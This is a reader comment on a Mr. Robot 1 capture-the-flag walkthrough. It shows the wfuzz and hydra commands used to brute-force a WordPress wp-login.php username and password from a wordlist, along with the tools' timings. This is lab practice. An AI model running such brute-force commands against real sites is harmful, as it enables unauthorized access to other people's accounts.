— Mr. Robot 1 CTF Walkthrough

Excellent article! I loved the pedagogy of presenting your way of thinking rather than just giving the solution like others do!
To crack the username and password on wp-login.php I used wfuzz and hydra tools.
time wfuzz -v -c -z file,/root/Documents/MrRobot/fsoc.dic — hs Invalid -d “log=FUZZ&pwd=ffffff”

real: 2m25

time wfuzz -v -c -z file,/root/Documents/MrRobot/fsoc.dic — hs incorrect -d “log=elliot&pwd=FUZZ”

real: 2m57

time hydra -L fsoc.dic -p DDDDD http-form-post “/wp-login.php:log=^USER^&pwd=ddddd:invalid”

real: 14m18

hydra -l elliot -P fsoc.dic http-form-post “/wp-login.php:log=elliot&pwd=^PASS^:incorrect”

real: 7m51

Isn’t amazing wfuzz is much more faster than hydra!

Like what you read? Give Fahmi MEGDICHE a round of applause.

From a quick cheer to a standing ovation, clap to show how much you enjoyed this story.